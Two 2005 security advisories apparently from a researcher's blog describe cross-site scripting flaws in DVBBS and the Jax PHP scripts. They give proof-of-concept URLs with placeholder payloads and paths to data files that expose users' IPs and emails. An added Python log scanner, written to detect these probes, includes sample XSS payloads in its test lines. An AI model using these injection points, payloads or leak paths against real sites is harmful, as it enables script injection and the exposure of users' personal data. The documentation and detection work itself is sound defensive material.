DVBBS Multiple variable Cross site scripting

Monday, August 08, 2005
#############################################
DVBBS Multiple variable Cross site scripting
vendor url: http://down.dvbbs.net/SoftView/SoftView_2455.html
Advisory: http://lostmon.blogspot.com/2005/08/dvbbs-multiple-variable-cross-site.html
vendor notify: yes   exploit available: yes
OSVDB ID: 18512, 18679, 18680
Securitytracker: 1014632
BID: 14498
Secunia: SA16131
#############################################

DVBBS contains a flaw that allows a remote cross site scripting
attack. The flaw exists because the application does not validate
multiple variables submitted to multiple scripts. This could
allow a user to create a specially crafted URL that would execute
arbitrary script code in another user's browser within the trust
relationship between the browser and the server, leading to a loss
of integrity.


############
solution
############

No solution available at this time.


############
versions
############

Dvbbs 7.1 Sp2
Dvbbs 7.1

#############
timeline
#############

discovered: 21-jul-2005
disclosure: 21-jul-2005
public disclosure: 08-aug-2005

####################
proof of concept
####################


http://[VICTIM]/dispbbs.asp?boardID=8&ID=550194&page=1[XSS-CODE]

http://[VICTIM]/dispuser.asp?name=Walltrapass[XSS-CODE]

http://[VICTIM]/boardhelp.asp?boardid=0&act=2&title=[XSS-CODE]
http://[VICTIM]/boardhelp.asp?boardid=0&view=faq[XSS-CODE]&act=3
http://[VICTIM]/boardhelp.asp?boardid=0&view=faq&act=3[XSS-CODE]
http://[VICTIM]/boardhelp.asp?boardid=0&act=2[XSS-CODE]&title=

######################## End ##########################

Thanks to estrella for being my light.

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....

Jax PHP Scripts multiple vulnerabilities

Friday, August 05, 2005
############################################
Jax PHP Scripts multiple vulnerabilities
vendor url: http://www.jtr.de/scripting/php/
Advisory: http://lostmon.blogspot.com/2005/08/jax-php-scripts-multiple.html
vendor notify: yes   exploit available: yes
OSVDB ID: 18568, 18569, 18570, 18571, 18572, 18573, 18574, 18575, 18576,
18577, 18578, 18579, 18580, 18581, 18582, 18583, 18584, 18585, 18586
Secunia: SA16332, SA16333, SA16337, SA16338
BID: 14481
#############################################


###########
summary:
###########

0- Description.
1- Products affected.
2- Jax Guestbook report.
3- Jax Petitionbook report.
4- Jax Newsletter report.
5- Jax LinkLists report.
6- Jax Calendar report.
7- Jax DWT Editor report.
8- Timeline

###############
0- Description
###############

Jax Scripts is a collection of useful PHP scripts to add to or include in a web site.

Jax Guestbook (GPL)* ==> PHP script for running a WWW guestbook

Jax Petitionbook (GPL)* ==> adaptation of Jax Guestbook for running a WWW petition book

Jax Newsletter (GPL)* ==> PHP script for running online mailing lists / newsletters
(Mailing List Manager)

Jax LinkLists (GPL)* ==> PHP script for running simple hyperlink lists
(Hyperlink Manager)

Jax Calendar (GPL)* ==> PHP script for running a simple web calendar
(Calendar Manager)

Jax DWT Editor (GPL)* ==> PHP script for editing HTML files based on Dreamweaver templates
(Template Editor)



###################
1- Products affected
###################

Jax Guestbook ==> Cross-Site Scripting and information disclosure.
Jax Petitionbook ==> Cross-Site Scripting and information disclosure.
Jax Newsletter ==> Cross-Site Scripting and information disclosure.
Jax LinkLists ==> Cross-Site Scripting and information disclosure.
Jax Calendar ==> Cross-Site Scripting.
Jax DWT Editor ==> Cross-Site Scripting.

##################
2- Jax Guestbook
##################

Cross-Site Scripting and information disclosure:

http://[victim]/guestbook/jax_guestbook.php?page=2&language=english&guestbook_id=0&gmt_ofs=0[XSS-CODE]

http://[victim]/jax_guestbook.php?page=2&language=english[XSS-CODE]&guestbook_id=0&gmt_ofs=0

http://[victim]/guestbook/jax_guestbook.php?page=2[XSS-CODE]&language=english&guestbook_id=0&gmt_ofs=0

http://[victim]/guestbook/jax_guestbook.php?mailto=9aa43a5efc2585681c97993d777bcd41&language=english[XSS-CODE]


http://[victim]/guestbook/guestbook
// IPs of the clients who have signed the guestbook

http://[victim]/guestbook/guestbook_ips2block
// list of banned IPs

http://[victim]/guestbook/ips2block
// list of banned IPs

http://[victim]/guestbook/formmailer/logfile.csv
// IPs of users who sent mail via the formmail.php script

############
versions
############

Jax Guestbook v3.1
Jax Guestbook v3.31

###################
3- Jax Petitionbook
###################

Cross-Site Scripting and information disclosure:

http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English&guestbook_id=0&gmt_ofs=0[XSS-CODE]

http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English[XSS-CODE]&guestbook_id=0&gmt_ofs=0

http://[victim]/petitionbook/shrimp_petition.php?page=3[XSS-CODE]&language=English&guestbook_id=0&gmt_ofs=0


http://[victim]/petitionbook/formmailer.log
// all IPs and messages that users sent via formmail


http://[victim]/petitionbook/ips2block
// all banned IPs

http://[victim]/petitionbook/petitionbook
// all IPs of people who have signed the petition



#################
4- Jax Newsletter
#################

Cross-Site Scripting and information disclosure:

http://[victim]/newsletter/jax_newsletter.php?language=German[XSS-CODE]&ml_id=1

http://[victim]/newsletter/sign_in.php?do=sign_in&language=german[XSS-CODE]&ml_id=1&ml_id=1

http://[victim]/newsletter/archive.php?language=spanish[XSS-CODE]

http://[victim]/newsletter/logs/jnl_records
// information disclosure of user data: a direct request
to this file reveals the fields

"email","hash","mail_format","gender","nick","mode",
"groups","action","time","ip","age","profession",
"nationality" for all registered users.

############
versions
############

Jax Newsletter v2.14
Jax Newsletter v2.10

#################
5- Jax LinkLists
#################

Cross-Site Scripting and information disclosure:

http://[victim]/linklists/jax_linklists.php?language=English[XSS-CODE]

http://[victim]/linklists/jax_linklists.php?do=list&list_id=0&language=english&cat=Religion[XSS-CODE]

http://[victim]/linklists/suggestions.csv
// a direct request discloses the IP of the client who
suggested a link.

#############
versions
#############

Jax LinkLists v1.1
Jax LinkLists v1.0


#################
6- Jax Calendar
#################

Cross-Site Scripting:

http://[victim]/calendar/jax_calendar.php?Y=2005[XSS-CODE]&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8[XSS-CODE]&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2[XSS-CODE]&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0[XSS-CODE]&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish[XSS-CODE]&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0[XSS-CODE]&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30[XSS-CODE]&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00[XSS-CODE]&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld

http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld[XSS-CODE]


http://[victim]/calendar/jax_calendar.php?&Y=2005&m=8&d=2&cal_id=0&language=spanish&gmt_ofs=0&view=d30&view=m12[XSS-CODE]

// all variables affected by XSS flaws

http://[victim]/calendar/modules/eventlist.inc.php?&Y=2005&m=8&d=2&cal_id=0&language=german&gmt_ofs=-1&view=d30&view=d1[XSS-CODE]

// all variables affected by XSS flaws

http://[victim]/calendar/modules/calendar.inc.php?Y=2013&m=8&d=2&cal_id=0&language=german&gmt_ofs=-1&view=d30

// all variables affected by XSS flaws



##############
versions
##############
Jax Calendar 1.34
Jax Calendar 1.33


#################
7- Jax DWT Editor
#################

Cross-Site Scripting:

http://[victim]/dwt_editor/dwt_editor.php?language=english[XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor


http://[victim]/dwt_editor/dwt_editor.php?language=english&cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor


http://[victim]/dwt_editor/dwt_editor.php?do=editarea&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=german&area=textbereich2[XSS-CODE]


##############
versions
##############

Jax DWT Editor v1.0

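Detection logic covering both advisories on this page (the DVBBS one above and this Jax one), as an added example that is not from the original posts or from either vendor: it scans access-log lines for requests that put markup into the query parameters of the scripts named in the PoC URLs, and for direct requests to the Jax data files reported as disclosing user IPs. The log format, the constructed sample lines and the markup heuristic are my assumptions; because the calendar advisory says all variables are affected, every parameter of a listed script is checked, not only the ones the PoC URLs mark.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit
# Scripts the two advisories report as reflecting query parameters unencoded.
XSS_SCRIPTS = {
    "dispbbs.asp", "dispuser.asp", "boardhelp.asp",               # DVBBS
    "jax_guestbook.php", "shrimp_petition.php",                   # Jax Guestbook / Petitionbook
    "jax_newsletter.php", "sign_in.php", "archive.php",           # Jax Newsletter
    "jax_linklists.php", "dwt_editor.php",                        # Jax LinkLists / DWT Editor
    "jax_calendar.php", "eventlist.inc.php", "calendar.inc.php",  # Jax Calendar
}
# Data files the Jax advisory reports as readable by a direct request.
DISCLOSURE_PATHS = {
    "/guestbook/guestbook", "/guestbook/guestbook_ips2block", "/guestbook/ips2block",
    "/guestbook/formmailer/logfile.csv", "/petitionbook/formmailer.log",
    "/petitionbook/ips2block", "/petitionbook/petitionbook",
    "/newsletter/logs/jnl_records", "/linklists/suggestions.csv",
}
# Assumed heuristic: characters that only matter if the value lands in HTML unencoded.
MARKUP = re.compile(r"""[<>"']|javascript:""", re.IGNORECASE)
# Assumed common log format: client, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(line):
    """Return (client_ip, finding) for a suspicious access-log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    parts = urlsplit(target)
    path = unquote_plus(parts.path)
    if path in DISCLOSURE_PATHS and status == "200":   # the leak was actually served
        return ip, "disclosure:" + path
    script = path.rsplit("/", 1)[-1].lower()
    if script in XSS_SCRIPTS:
        # parse_qsl percent-decodes, so encoded brackets are caught as well
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if MARKUP.search(value):
                return ip, f"xss-probe:{script}:{name}"
    return None

def scan(log_text):
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]

# Constructed sample log (not from the advisories): probe, benign, leak, probe.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Aug/2005:10:00:01 +0200] "GET /dispbbs.asp?boardID=8&ID=550194&page=1%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5120
203.0.113.5 - - [08/Aug/2005:10:00:02 +0200] "GET /guestbook/jax_guestbook.php?page=2&language=english&guestbook_id=0&gmt_ofs=0 HTTP/1.1" 200 3311
203.0.113.9 - - [08/Aug/2005:10:00:03 +0200] "GET /newsletter/logs/jnl_records HTTP/1.1" 200 88
203.0.113.9 - - [08/Aug/2005:10:00:04 +0200] "GET /calendar/jax_calendar.php?Y=2005&m=8&d=2&cal_id=0&language=spanish%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 4020
"""
```

Running `scan(SAMPLE_LOG)` flags the first, third and fourth lines and leaves the ordinary guestbook request alone; a 404 on one of the data files is also ignored, since only a served leak is worth an alert.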

###################
8- Timeline
###################

discovered:27-07-2005
Vendor notify:04-08-2005
vendor response:04-08-2005
disclosure:05-08-2005

#################### End #############################

Thanks to estrella for being my light.
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....